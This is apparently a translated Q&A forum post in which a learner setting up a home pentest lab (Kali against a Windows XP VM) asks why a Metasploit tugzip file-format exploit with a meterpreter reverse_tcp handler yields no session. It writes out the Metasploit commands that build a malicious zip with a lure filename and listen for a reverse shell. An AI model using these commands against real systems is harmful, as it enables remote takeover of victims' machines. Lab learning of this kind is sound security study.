Reverse_tcp exploit en VM con Windows XP

1

Bueno, estoy aprendiendo a hacer pentest con Metasploit y estaba usando un exploit llamado "tugzip" que usa un protocolo rever_tcp, así que instalé Kali linux en mi computadora y usé una máquina virtual con Windows XP. Así que primero configuro el tugzip de esta manera:

use exploit/windows/fileformat/tugzip set FILENAME HotGirl.zip set LHOST 172.16.98.1(IP that i could ping from my VM that i assume it was mine) set LPORT 443 exploit

Moví el archivo que creé a la sesión de la máquina virtual de Windows XP, y luego trato de iniciar una escucha y así lo hice:

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set LHOST 172.16.98.1 set LPORT 443

entonces aparentemente todo está bien porque me muestra esto:

[*] Exploit running as background job 3. [*] Started reverse TCP handler on 172.16.98.1:443

Pero cuando abrí el archivo HotGirl.zip en mi máquina virtual Windows XP, no se abrirá una nueva sesión en Metasploit, no sé que no esté pasando nada.

p.s. Estoy usando VirtualBox

    
pregunta Nelson Candia 17.11.2017 - 22:59
fuente

0 respuestas

Lea otras preguntas en las etiquetas